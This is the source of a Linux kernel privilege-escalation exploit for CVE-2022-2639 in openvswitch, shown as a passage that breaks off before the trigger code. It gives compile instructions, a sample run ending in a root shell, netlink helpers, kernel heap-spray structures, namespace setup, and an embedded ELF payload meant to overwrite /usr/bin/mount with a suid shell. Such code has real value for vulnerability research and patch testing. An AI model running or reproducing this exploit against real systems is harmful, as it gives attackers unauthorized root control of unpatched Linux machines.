/*
 * Web-page residue captured together with this file (not part of the program):
 *   4837 Total CVEs
 *   26 Years
 *   GitHub
 *   README.md
 *   Rendering markdown...
 *   POC / exploit.c C
 */
/**
 * CVE-2022-2639 openvswitch LPE exploit
 *
 * This exploit uses the pipe-primitive technique, so neither a KASLR leak
 *  nor an SMAP/SMEP/KPTI bypass is needed.
 *
 * Compile with:
 *  gcc exploit.c -o exploit -static -no-pie -s
 *
 * This exploit will overwrite /usr/bin/mount with suid-shell and
 *  execute it. BACKUP IT MANUALLY before running exploit, and
 *  RESTORE it quickly after exploit success.
 *
 * / $ ./exploit
 * [*] exploit.c:1183 initialize exploit environment ...
 * [+] exploit.c:630 get dp_family_id = 33
 * [+] exploit.c:637 get flow_family_id = 35
 * [*] exploit.c:1186 create br to check if openvswitch works ...
 * [*] exploit.c:781 br1337 ifindex: 7
 * [*] exploit.c:1189 do exploit step 1 ...
 * [*] exploit.c:880 do heap fengshui to reduce noise ...
 * [*] exploit.c:896 sparying msg_msg ...
 * [*] exploit.c:907 free other rx_ring buffer ...
 * [*] exploit.c:915 trigger vuln to do heap oob write ...
 * [*] exploit.c:925 search corrupted msg_msg ...
 * [+] exploit.c:932 corrupted msg_msg found, id: 52
 * [*] exploit.c:949 clean unused msg_msg ...
 * [*] exploit.c:953 alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...
 * [*] exploit.c:979 it works :)
 * [+] exploit.c:993 leak list2_leak_msqid: 1029
 * [+] exploit.c:994 leak list2_leak_mtype: 0x942
 * [+] exploit.c:995 leak list2_uaf_msg_addr: 0xffff888007676400
 * [+] exploit.c:996 leak list2_uaf_mtype: 0x842
 * [*] exploit.c:1000 clean unused msg_msg ...
 * [*] exploit.c:1194 do exploit step 2 ...
 * [*] exploit.c:1009 do heap fengshui to reduce noise ...
 * [*] exploit.c:1025 sparying msg_msg ...
 * [*] exploit.c:1036 free other rx_ring buffer ...
 * [*] exploit.c:1044 trigger vuln to do heap oob write ...
 * [*] exploit.c:1051 free uaf msg_msg from correct msqid
 * [*] exploit.c:1057 spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg
 * [*] exploit.c:1071 free skbuff_data using fake msqid
 * [*] exploit.c:1074 freed using msqid 104
 * [*] exploit.c:1080 spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data
 * [*] exploit.c:1099 free skbuff_data to make pipe_buffer become UAF
 * [+] exploit.c:1115 uaf_pipe_idx: 2
 * [*] exploit.c:1126 edit pipe_buffer->flags
 * [*] exploit.c:1138 try to overwrite /usr/bin/mount
 * [*] exploit.c:1149 see if /usr/bin/mount changed
 * [+] exploit.c:1163 exploit success
 * [*] exploit.c:1199 maybe unsafe to exit, sleep infinitely ...
 * / # id
 * uid=0(root) gid=0(root) groups=1000(ctf)
 *
 */

#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/genetlink.h>
#include <linux/if_packet.h>
#include <linux/netlink.h>
#include <linux/openvswitch.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <unistd.h>

/* ANSI escape sequences used to colour log lines. */
#define COLOR_GREEN "\033[32m"
#define COLOR_RED "\033[31m"
#define COLOR_YELLOW "\033[33m"
#define COLOR_DEFAULT "\033[0m"

/*
 * Logging helpers. Each one writes a single line to file descriptor 2,
 * prefixed with a severity tag and the __FILE__:__LINE__ of the call site:
 *   logd -> "[*]" (no colour), logi -> "[+]" (green),
 *   logw -> "[!]" (yellow),    loge -> "[-]" (red).
 */
#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__)
#define logi(fmt, ...) dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define logw(fmt, ...) dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define loge(fmt, ...) dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
/*
 * die: log the message and the exit line via loge, write the single byte "F"
 * to sync_pipe[1], then exit(1). The return value of write() is ignored.
 * NOTE(review): presumably a process reading sync_pipe[0] treats "F" as a
 * failure signal; the reader is not visible in this part of the file.
 */
#define die(fmt, ...)                      \
    do {                                   \
        loge(fmt, ##__VA_ARGS__);          \
        loge("Exit at line %d", __LINE__); \
        write(sync_pipe[1], "F", 1);       \
        exit(1);                           \
    } while (0)

/*
 * Number of elements in the array x. x must be a real array (not a pointer);
 * the argument is parenthesised so that expressions such as `*p` index correctly.
 */
#define ELEM_CNT(x) (sizeof(x) / sizeof((x)[0]))

/* Description of one netlink attribute to be serialised by ovsmsg_send(). */
struct ovs_attr {
    uint16_t type; /* copied into nlattr.nla_type */
    void *data;    /* payload bytes; `len` bytes are memcpy'd from here */
    uint16_t len;  /* payload length in bytes, without the attribute header */
};

/* Pointer to the bytes that follow a generic netlink header (GENL_HDRLEN past glh). */
#define GENLMSG_DATA(glh) ((void *)(((char *)glh) + GENL_HDRLEN))
/* Pointer to the payload of attribute nla (NLA_HDRLEN past its header). */
#define NLA_DATA(nla) ((void *)((char *)(nla) + NLA_HDRLEN))
/*
 * Advance to the attribute after nla: subtracts the aligned length of nla
 * from len (len is modified) and evaluates to the next attribute pointer.
 */
#define NLA_NEXT(nla, len) ((len) -= NLA_ALIGN((nla)->nla_len), \
                            (struct nlattr *)(((char *)(nla)) + NLA_ALIGN((nla)->nla_len)))
/*
 * True when at least one attribute header fits in the remaining len bytes and
 * nla->nla_len is at least a header and no larger than len.
 */
#define NLA_OK(nla, len) ((len) >= (int)sizeof(struct nlattr) &&     \
                          (nla)->nla_len >= sizeof(struct nlattr) && \
                          (nla)->nla_len <= (len))

/* Unpadded size of a netlink attribute: header (NLA_HDRLEN) plus `payload` bytes. */
int nla_attr_size(int payload) {
    int attr_bytes = payload;

    attr_bytes += NLA_HDRLEN;
    return attr_bytes;
}

/* Space an attribute with `payload` bytes occupies in a message: nla_attr_size() rounded up by NLA_ALIGN. */
int nla_total_size(int payload) {
    int unpadded = nla_attr_size(payload);

    return NLA_ALIGN(unpadded);
}

/*
 * Open a NETLINK_GENERIC raw socket and bind it with nl_pid set to getpid().
 *
 * Returns the socket descriptor, or -1 after logging which call failed
 * (the socket is closed again if bind() fails).
 */
int genlmsg_open(void) {
    struct sockaddr_nl local;
    int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);

    if (fd < 0) {
        loge("socket: %m");
        return -1;
    }

    memset(&local, 0, sizeof(local));
    local.nl_family = AF_NETLINK;
    local.nl_pid = getpid();

    if (bind(fd, (struct sockaddr *)&local, sizeof(local)) < 0) {
        loge("bind: %m");
        close(fd);
        return -1;
    }

    return fd;
}

/*
 * Allocate a zero-filled buffer for one generic netlink message.
 *
 * On entry *size is the payload length of a single attribute. The buffer is
 * sized as NLMSG_SPACE(attribute header + padded payload + GENL_HDRLEN); no
 * family-specific header is accounted for. On success *size is replaced by
 * the allocated length and the buffer is returned; on allocation failure
 * NULL is returned and *size is left untouched. Release with genlmsg_free().
 */
void *genlmsg_alloc(int *size) {
    int total = NLMSG_SPACE(nla_total_size(*size) + GENL_HDRLEN);
    unsigned char *mem = calloc(1, total);

    if (mem == NULL)
        return NULL;

    *size = total;
    return mem;
}

/* Release a buffer obtained from genlmsg_alloc(); passing NULL is a no-op. */
void genlmsg_free(void *buf) {
    free(buf);
}

/*
 * Build and send a generic netlink request carrying exactly one attribute.
 *
 * sockfd       netlink socket to send on
 * nlmsg_type   value for nlmsghdr.nlmsg_type (must be non-zero)
 * nlmsg_pid    value for nlmsghdr.nlmsg_pid
 * genl_cmd     genlmsghdr.cmd
 * genl_version genlmsghdr.version
 * nla_type     attribute type
 * nla_data     attribute payload (must be non-NULL)
 * nla_len      payload length in bytes (must be non-zero)
 *
 * The message is sent with NLM_F_REQUEST and sequence number 0 to a zeroed
 * AF_NETLINK address. sendto() is retried while it fails with EAGAIN or
 * until the whole buffer has been accepted.
 *
 * Returns the number of bytes sent, or -1 on bad arguments, allocation
 * failure, or a sendto() error other than EAGAIN.
 */
int genlmsg_send(int sockfd, unsigned short nlmsg_type, unsigned int nlmsg_pid,
                 unsigned char genl_cmd, unsigned char genl_version,
                 unsigned short nla_type, const void *nla_data, unsigned int nla_len) {
    struct sockaddr_nl kernel_addr;
    struct nlmsghdr *hdr;
    struct genlmsghdr *genl;
    struct nlattr *attr;
    unsigned char *msg_buf;
    int msg_len;
    int sent = 0;

    if (nlmsg_type == 0 || nla_data == NULL || nla_len == 0)
        return -1;

    msg_len = nla_len;
    msg_buf = genlmsg_alloc(&msg_len);
    if (msg_buf == NULL)
        return -1;

    /* netlink header */
    hdr = (struct nlmsghdr *)msg_buf;
    hdr->nlmsg_len = msg_len;
    hdr->nlmsg_type = nlmsg_type;
    hdr->nlmsg_flags = NLM_F_REQUEST;
    hdr->nlmsg_seq = 0;
    hdr->nlmsg_pid = nlmsg_pid;

    /* generic netlink header */
    genl = (struct genlmsghdr *)NLMSG_DATA(hdr);
    genl->cmd = genl_cmd;
    genl->version = genl_version;

    /* the single attribute */
    attr = (struct nlattr *)GENLMSG_DATA(genl);
    attr->nla_type = nla_type;
    attr->nla_len = nla_attr_size(nla_len);
    memcpy(NLA_DATA(attr), nla_data, nla_len);

    memset(&kernel_addr, 0, sizeof(kernel_addr));
    kernel_addr.nl_family = AF_NETLINK;

    for (;;) {
        int n = sendto(sockfd, &msg_buf[sent], msg_len - sent, 0,
                       (struct sockaddr *)&kernel_addr, sizeof(kernel_addr));

        if (n >= 0) {
            sent += n;
        } else if (errno != EAGAIN) {
            sent = -1;
            break;
        }

        if (sent >= msg_len)
            break;
    }

    genlmsg_free(msg_buf);
    return sent;
}

/*
 * Receive one message from sockfd into buf (at most len bytes) using a
 * single recvmsg() call with no control data.
 *
 * Returns the number of bytes received when that is positive; a return of 0
 * or an error from recvmsg() is reported as -1.
 */
int genlmsg_recv(int sockfd, unsigned char *buf, unsigned int len) {
    struct sockaddr_nl peer = {
        .nl_family = AF_NETLINK,
        .nl_pid = getpid(),
    };
    struct iovec vec = {
        .iov_base = buf,
        .iov_len = len,
    };
    struct msghdr hdr = {
        .msg_name = (void *)&peer,
        .msg_namelen = sizeof(peer),
        .msg_iov = &vec,
        .msg_iovlen = 1,
        .msg_control = NULL,
        .msg_controllen = 0,
        .msg_flags = 0,
    };
    int got = recvmsg(sockfd, &hdr, 0);

    if (got > 0)
        return got;
    return -1;
}

/*
 * Walk the netlink messages in a receive buffer and copy out the payload of
 * the first attribute of type nla_type found in each generic netlink message.
 *
 * nlmsghdr    start of the received data
 * nlh_len     number of valid bytes at nlmsghdr
 * nlmsg_type  if non-zero, the first message must have this type
 * nla_type    attribute type to look for
 * buf         destination for the attribute payload
 * len         in: capacity of buf; out: clamped to the payload size when a
 *             match is copied
 *
 * Returns 0 when a matching attribute was copied or NLMSG_DONE was reached,
 * -1 on bad arguments, on NLMSG_ERROR, or when nothing matched. As before,
 * scanning continues with the following messages after a match, so a later
 * match overwrites buf and a later NLMSG_ERROR turns the result into -1.
 *
 * The attribute area is bounded by nlmsg_len minus BOTH the netlink header
 * and the generic netlink header, so the walk never leaves the message.
 */
int genlmsg_dispatch(struct nlmsghdr *nlmsghdr, unsigned int nlh_len,
                     int nlmsg_type, int nla_type, unsigned char *buf, int *len) {
    struct nlmsghdr *nlh;
    int ret = -1;

    if (!nlmsghdr || !buf || !len || *len < 0)
        return -1;

    if (nlmsg_type &&
        (nlh_len < sizeof(*nlmsghdr) || nlmsghdr->nlmsg_type != nlmsg_type)) {
        return -1;
    }

    for (nlh = nlmsghdr; NLMSG_OK(nlh, nlh_len); nlh = NLMSG_NEXT(nlh, nlh_len)) {
        /* The end of multipart message. */
        if (nlh->nlmsg_type == NLMSG_DONE) {
            ret = 0;
            break;
        }

        if (nlh->nlmsg_type == NLMSG_ERROR) {
            ret = -1;
            break;
        }

        /* Too short to even hold a generic netlink header: nothing to scan. */
        if (nlh->nlmsg_len < NLMSG_LENGTH(GENL_HDRLEN))
            continue;

        /* Attributes start right after the generic netlink header. */
        char *cur = (char *)NLMSG_DATA(nlh) + GENL_HDRLEN;
        int remaining = (int)(nlh->nlmsg_len - NLMSG_LENGTH(GENL_HDRLEN));

        while (remaining >= NLA_HDRLEN) {
            struct nlattr *nla = (struct nlattr *)cur;

            /* Malformed or truncated attribute: stop scanning this message. */
            if (nla->nla_len < NLA_HDRLEN || nla->nla_len > remaining)
                break;

            if (nla_type == nla->nla_type) {
                int payload = nla->nla_len - NLA_HDRLEN;

                if (*len > payload)
                    *len = payload;
                memcpy(buf, cur + NLA_HDRLEN, *len);
                ret = 0;
                break;
            }

            remaining -= NLA_ALIGN(nla->nla_len);
            cur += NLA_ALIGN(nla->nla_len);
        }
    }

    return ret;
}

/*
 * Resolve a generic netlink family name to its numeric id.
 *
 * Sends CTRL_CMD_GETFAMILY with CTRL_ATTR_FAMILY_NAME to GENL_ID_CTRL on
 * sockfd, receives one reply and extracts CTRL_ATTR_FAMILY_ID from it.
 *
 * Returns the family id (> 0), or -1 if family_name is NULL, the request
 * could not be sent, the reply could not be received, or the reply carried
 * no family id. The receive buffer is released on every path.
 */
int genlmsg_get_family_id(int sockfd, const char *family_name) {
    void *buf;
    int len;
    __u16 id = 0;
    int l = sizeof(id);
    int ret;

    if (!family_name)
        return -1;

    ret = genlmsg_send(sockfd, GENL_ID_CTRL, 0, CTRL_CMD_GETFAMILY, 1,
                       CTRL_ATTR_FAMILY_NAME, family_name, strlen(family_name) + 1);
    if (ret < 0)
        return -1;

    len = 256;
    buf = genlmsg_alloc(&len);
    if (!buf)
        return -1;

    len = genlmsg_recv(sockfd, buf, len);
    if (len < 0) {
        /* previously returned here without freeing buf */
        genlmsg_free(buf);
        return -1;
    }

    /* id stays 0 when the attribute is absent, which maps to -1 below */
    genlmsg_dispatch((struct nlmsghdr *)buf, len, 0, CTRL_ATTR_FAMILY_ID, (unsigned char *)&id, &l);

    genlmsg_free(buf);

    return id > 0 ? id : -1;
}

/* Close sockfd if it is a non-negative descriptor; negative values are ignored. */
void genlmsg_close(int sockfd) {
    if (sockfd < 0)
        return;

    close(sockfd);
}

/*
 * Build and send one generic netlink request that carries a struct ovs_header
 * followed by attr_num attributes taken from ovs_attrs.
 *
 * sockfd        netlink socket to send on
 * nlmsg_type    nlmsghdr.nlmsg_type (callers in this file pass a family id)
 * nlmsg_pid     nlmsghdr.nlmsg_pid
 * genl_cmd      genlmsghdr.cmd
 * genl_version  genlmsghdr.version
 * dp_ifindex    stored in ovs_header.dp_ifindex
 * ovs_attrs     attributes to serialise, in order
 * attr_num      number of entries in ovs_attrs
 *
 * Returns the number of bytes sent, or -1 on allocation failure or on a
 * sendto() error other than EAGAIN (EAGAIN is retried in a loop).
 *
 * NOTE(review): genlmsg_alloc() sizes the buffer for ONE attribute whose
 * payload is `len`, i.e. it adds one NLA_HDRLEN but nothing for the OVS
 * header. The attributes are written 4 bytes after the genl header instead.
 * The buffer is exactly large enough only if sizeof(struct ovs_header)
 * equals NLA_HDRLEN (4) — confirm before changing either side.
 */
int ovsmsg_send(int sockfd, uint16_t nlmsg_type, uint32_t nlmsg_pid,
                uint8_t genl_cmd, uint8_t genl_version,
                int dp_ifindex, struct ovs_attr *ovs_attrs, int attr_num) {
    struct nlmsghdr *nlh;   // netlink message header
    struct genlmsghdr *glh; // generic netlink message header
    struct nlattr *nla;     // netlink attribute header
    struct ovs_header *ovh; // ovs user header

    struct sockaddr_nl nladdr;
    unsigned char *buf;
    int len = 0;

    int count;
    int ret;

    // total padded size of all attributes
    for (int i = 0; i < attr_num; i++) {
        len += nla_total_size(ovs_attrs[i].len);
    }

    // on return len holds the full allocated message length
    buf = genlmsg_alloc(&len);
    if (!buf) {
        return -1;
    }

    nlh = (struct nlmsghdr *)buf;
    nlh->nlmsg_len = len;
    nlh->nlmsg_type = nlmsg_type;
    nlh->nlmsg_flags = NLM_F_REQUEST;
    nlh->nlmsg_seq = 0;
    nlh->nlmsg_pid = nlmsg_pid;

    glh = (struct genlmsghdr *)NLMSG_DATA(nlh);
    glh->cmd = genl_cmd;
    glh->version = genl_version;

    ovh = (struct ovs_header *)GENLMSG_DATA(glh);
    ovh->dp_ifindex = dp_ifindex;
    // attributes start 4 bytes after the genl header (arithmetic on void * is a GNU extension)
    char *offset = GENLMSG_DATA(glh) + 4;
    for (int i = 0; i < attr_num; i++) {
        nla = (struct nlattr *)(offset);
        nla->nla_type = ovs_attrs[i].type;
        nla->nla_len = nla_attr_size(ovs_attrs[i].len);
        memcpy(NLA_DATA(nla), ovs_attrs[i].data, ovs_attrs[i].len);
        offset += nla_total_size(ovs_attrs[i].len);
    }
    memset(&nladdr, 0, sizeof(nladdr));
    nladdr.nl_family = AF_NETLINK;

    // keep calling sendto() until everything is sent; only EAGAIN is retried
    count = 0;
    ret = 0;
    do {
        ret = sendto(sockfd, &buf[count], len - count, 0,
                     (struct sockaddr *)&nladdr, sizeof(nladdr));
        if (ret < 0) {
            if (errno != EAGAIN) {
                count = -1;
                goto out;
            }
        } else {
            count += ret;
        }
    } while (count < len);

out:
    genlmsg_free(buf);
    return count;
}

/* Path of the file named as the overwrite target in the header comment. */
#define ATTACK_FILE "/usr/bin/mount"
/*
 * Replacement content for ATTACK_FILE. The array begins with the ELF magic
 * bytes 0x7f 'E' 'L' 'F'.
 * NOTE(review): the file header comment describes this as a "suid-shell";
 * the bytes were not independently decoded here.
 */
const char attack_data[] = {
    0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00,
    0x00, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00,
    0x03, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xe8, 0x00, 0x00, 0x00, 0x00, 0x58, 0xeb, 0x48,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00,
    0x01, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x57, 0x54, 0x59, 0x48, 0x33, 0x39, 0x59, 0x6a,
    0x6f, 0x54, 0x59, 0x66, 0x69, 0x39, 0x70, 0x59,
    0x57, 0x5a, 0x6a, 0x4a, 0x54, 0x59, 0x66, 0x69,
    0x39, 0x70, 0x30, 0x30, 0x74, 0x38, 0x30, 0x30,
    0x54, 0x38, 0x55, 0x30, 0x54, 0x38, 0x56, 0x6a,
    0x42, 0x54, 0x59, 0x66, 0x69, 0x39, 0x38, 0x59,
    0x30, 0x74, 0x38, 0x30, 0x30, 0x54, 0x38, 0x4b,
    0x48, 0x63, 0x31, 0x6a, 0x73, 0x54, 0x59, 0x66,
    0x69, 0x31, 0x36, 0x78, 0x4c, 0x4a, 0x74, 0x30,
    0x49, 0x6a, 0x52, 0x54, 0x59, 0x66, 0x69, 0x31,
    0x45, 0x6d, 0x56, 0x59, 0x49, 0x4a, 0x34, 0x4e,
    0x56, 0x54, 0x58, 0x41, 0x6b, 0x76, 0x32, 0x31,
    0x42, 0x32, 0x74, 0x31, 0x31, 0x41, 0x30, 0x76,
    0x31, 0x49, 0x6f, 0x56, 0x4c, 0x39, 0x30, 0x75,
    0x7a, 0x64, 0x54, 0x58, 0x73, 0x78, 0x30, 0x42,
    0x41, 0x31, 0x73, 0x6a, 0x7a, 0x36, 0x64, 0x75,
    0x54, 0x6f, 0x41, 0x37, 0x7a, 0x4b, 0x35, 0x70,
    0x79, 0x31, 0x72, 0x41, 0x73, 0x6a, 0x59, 0x79,
    0x64, 0x59, 0x55, 0x6a, 0x36, 0x35, 0x46, 0x65,
    0x59, 0x6e, 0x6e, 0x56, 0x4b, 0x50, 0x30, 0x6e,
    0x45, 0x59, 0x50, 0x6e, 0x36, 0x50, 0x39, 0x63,
    0x70, 0x37, 0x6d, 0x4a, 0x4b, 0x62, 0x79, 0x68,
    0x4b, 0x63, 0x52, 0x4f, 0x7a, 0x64, 0x75, 0x4f,
    0x4d, 0x33, 0x4c, 0x7a, 0x36, 0x38, 0x66};

/* Page size assumed by the size arithmetic below unless already defined. */
#ifndef PAGE_SIZE
#define PAGE_SIZE (0x1000)
#endif
/* Number of message queues in msqid_1[] and msqid_2[]. */
#define NUM_MSQIDS_1 (0x400)
#define NUM_MSQIDS_2 (0x400)
#define HOLE_STEP (0x100)
/*
 * User-visible text length of a message whose total footprint is x bytes:
 * x minus one struct msg_msg header and one struct msg_msgseg header for
 * every page after the first. The argument is fully parenthesised so that
 * expressions with low-precedence operators are evaluated as a unit.
 */
#define MSG_TEXT_SIZE(x) (         \
    (x) - sizeof(struct msg_msg) - \
    sizeof(struct msg_msgseg) * ((((x) + PAGE_SIZE - 1) / PAGE_SIZE) - 1))
/* Footprints and derived text sizes of the two message shapes used in this file. */
#define MSG_A_RAW_SIZE (0x1400)
#define MSG_B_RAW_SIZE (0x400)
#define MSG_A_TEXT_SIZE MSG_TEXT_SIZE(MSG_A_RAW_SIZE)
#define MSG_B_TEXT_SIZE MSG_TEXT_SIZE(MSG_B_RAW_SIZE)
/* Message type values used with msgsnd()/msgrcv(). */
#define MTYPE_A (0x41)
#define MTYPE_B (0x42)
#define MTYPE_FAKE (0x43)
/* Marker stored in the first int of every sprayed message text. */
#define MSG_SIG (0x13371337)
/* Dimensions of sock_pairs[], the per-socket write/read loops, and pipes[]. */
#define NUM_SOCKETS (4)
#define NUM_SKBUFFS (0x20)
#define SIZE_OF_SKB_SHARED_INFO (0x140)
#define NUM_PIPES (0x100)
/* Number of single-block packet sockets opened by the exploit steps. */
#define fengshui_skfd_cnt (0x20)

/* Two 64-bit link fields, stored as integers rather than pointers. */
struct list_head {
    uint64_t next;
    uint64_t prev;
};

/*
 * Userland description of a message header followed by its text. It is used
 * by MSG_TEXT_SIZE() and to interpret or forge header bytes.
 * NOTE(review): presumably mirrors the kernel's struct msg_msg layout on the
 * target kernel — confirm field order and sizes against that kernel.
 */
struct msg_msg {
    struct list_head m_list;
    uint64_t m_type;
    uint64_t m_ts;
    uint64_t next;
    uint64_t security;
    char mtext[0]; /* zero-length trailing array (GNU extension) */
};

/* Header of a message continuation segment; only its size is used via MSG_TEXT_SIZE(). */
struct msg_msgseg {
    uint64_t next;
};

/* Buffer layout passed to msgsnd()/msgrcv(): message type followed by the text. */
struct typ_msg {
    long mtype;
    char mtext[0]; /* zero-length trailing array (GNU extension) */
};

/*
 * Userland description of a pipe buffer record.
 * NOTE(review): presumably mirrors the kernel's struct pipe_buffer; its use
 * is outside the visible part of this file — confirm against the target kernel.
 */
struct typ_pipe_buffer {
    uint64_t page;
    uint32_t offset;
    uint32_t len;
    uint64_t ops;
    uint32_t flags;
    uint32_t padding1;
    uint64_t private;
};

/* Pipe whose write end receives "F" from die(); set up outside the visible code. */
int sync_pipe[2];

/* Socket pairs filled by init_sock(); pipes[] is used outside the visible code. */
int sock_pairs[NUM_SOCKETS][2];
int pipes[NUM_PIPES][2];

/*
 * One shared scratch buffer for every System V message operation. msg,
 * msg_a, msg_a_oob and msg_b are all aliases of msg_buffer, so each
 * msgsnd()/msgrcv() overwrites what the previous one left there.
 */
char msg_buffer[0x4000] = {0};
struct typ_msg *msg = (struct typ_msg *)msg_buffer;
/* Queue ids created by init_msq(). */
int msqid_1[NUM_MSQIDS_1];
int msqid_2[NUM_MSQIDS_2];
struct typ_msg *msg_a = (struct typ_msg *)msg_buffer;
struct typ_msg *msg_a_oob = (struct typ_msg *)msg_buffer;
struct typ_msg *msg_b = (struct typ_msg *)msg_buffer;
/* Results recorded by exploit_step1(); -1 / 0 mean "not found yet". */
int list1_corrupted_msqid = -1;
int list2_leak_msqid = -1;
int list2_leak_mtype = 0;
uint64_t list2_uaf_msg_addr = 0;
uint64_t list2_leak_security = 0;
int list2_uaf_mtype = 0;
uint64_t heap_buffer_addr = 0;

/* Generic netlink socket and the family ids resolved by init_nl_sock(). */
int nl_sockfd = -1;
int dp_family_id = 1;
int flow_family_id = -1;

/*
 * Write a hex + ASCII dump of `size` bytes at `data` to file descriptor 2.
 *
 * Each output row shows up to 16 bytes as two-digit upper-case hex, with an
 * extra space after the 8th byte, followed by "|  " and the same bytes as
 * text (bytes outside ' '..'~' are shown as '.'). A short final row is
 * padded so the text column stays aligned. Nothing is written for size 0.
 */
void hexdump(const void *data, size_t size) {
    const unsigned char *bytes = data;
    char text[17];
    size_t pos;

    text[16] = '\0';
    for (pos = 0; pos < size; ++pos) {
        unsigned char b = bytes[pos];
        size_t done = pos + 1; /* bytes emitted so far */
        size_t col = done % 16;

        dprintf(2, "%02X ", b);
        text[pos % 16] = (b >= ' ' && b <= '~') ? (char)b : '.';

        /* only group boundaries and the very last byte need more output */
        if (done % 8 != 0 && done != size)
            continue;

        dprintf(2, " ");
        if (col == 0) {
            /* full row */
            dprintf(2, "|  %s \n", text);
            continue;
        }
        if (done != size)
            continue;

        /* short final row: terminate the text and pad the hex columns */
        text[col] = '\0';
        if (col <= 8)
            dprintf(2, " ");
        for (size_t pad = col; pad < 16; ++pad)
            dprintf(2, "   ");
        dprintf(2, "|  %s \n", text);
    }
}

/*
 * Move the process into new user, mount and network namespaces, then write
 * "deny" to /proc/self/setgroups and single-entry maps to
 * /proc/self/uid_map and /proc/self/gid_map.
 *
 * A failing unshare() is fatal (die). The return values of open() and
 * write() on the /proc files are not checked, so failures there are silent.
 *
 * NOTE(review): getuid()/getgid() are evaluated after
 * unshare(CLONE_NEWUSER). Per user_namespaces(7) a namespace without a
 * mapping reports the overflow id, so these writes may not map the original
 * ids. The rest of the file was run with this behaviour — confirm before
 * changing it.
 */
void init_unshare() {
    int fd;
    char buff[0x100];

    // strace from `unshare -Ur xxx`
    if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
        die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
    }

    if (unshare(CLONE_NEWNET)) {
        die("unshare(CLONE_NEWNET): %m");
    }

    // setgroups must be written before gid_map
    fd = open("/proc/self/setgroups", O_WRONLY);
    snprintf(buff, sizeof(buff), "deny");
    write(fd, buff, strlen(buff));
    close(fd);

    fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(buff, sizeof(buff), "0 %d 1", getuid());
    write(fd, buff, strlen(buff));
    close(fd);

    fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(buff, sizeof(buff), "0 %d 1", getgid());
    write(fd, buff, strlen(buff));
    close(fd);
}

/* Restrict the calling thread to CPU 0; exits through die() if that fails. */
void bind_cpu() {
    cpu_set_t only_cpu0;

    CPU_ZERO(&only_cpu0);
    CPU_SET(0, &only_cpu0);

    if (sched_setaffinity(0, sizeof(only_cpu0), &only_cpu0) != 0) {
        die("sched_setaffinity: %m");
    }
}

/*
 * Open the generic netlink socket (nl_sockfd) and resolve the datapath and
 * flow family ids into dp_family_id and flow_family_id.
 *
 * Any failure is fatal (die). If both lookups return the same id the socket
 * is closed and the whole sequence is repeated until the ids differ.
 */
void init_nl_sock() {
    for (;;) {
        nl_sockfd = genlmsg_open();
        if (nl_sockfd < 0) {
            die("open sock failed");
        }

        dp_family_id = genlmsg_get_family_id(nl_sockfd, OVS_DATAPATH_FAMILY);
        if (dp_family_id < 0) {
            die("get dp_family_id failed");
        }
        logi("get dp_family_id = %d", dp_family_id);

        flow_family_id = genlmsg_get_family_id(nl_sockfd, OVS_FLOW_FAMILY);
        if (flow_family_id < 0) {
            die("get flow_family_id failed");
        }
        logi("get flow_family_id = %d", flow_family_id);

        if (dp_family_id != flow_family_id) {
            return;
        }

        // identical ids are treated as a bogus reply: start over
        logw("id are same, retry ...");
        genlmsg_close(nl_sockfd);
    }
}

/*
 * Create NUM_MSQIDS_1 private message queues into msqid_1[] and then
 * NUM_MSQIDS_2 into msqid_2[]; any msgget() failure is fatal (die).
 */
void init_msq() {
    int idx;

    idx = 0;
    while (idx < NUM_MSQIDS_1) {
        int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);

        msqid_1[idx] = qid;
        if (qid < 0) {
            die("msgget() fail");
        }
        idx++;
    }

    idx = 0;
    while (idx < NUM_MSQIDS_2) {
        int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);

        msqid_2[idx] = qid;
        if (qid < 0) {
            die("msgget() fail");
        }
        idx++;
    }
}

/* Create NUM_SOCKETS AF_UNIX stream socket pairs in sock_pairs[]; failure is fatal (die). */
void init_sock() {
    int idx = 0;

    while (idx < NUM_SOCKETS) {
        int rc = socketpair(AF_UNIX, SOCK_STREAM, 0, sock_pairs[idx]);

        if (rc < 0) {
            die("socketpair(): %m");
        }
        idx++;
    }
}

/*
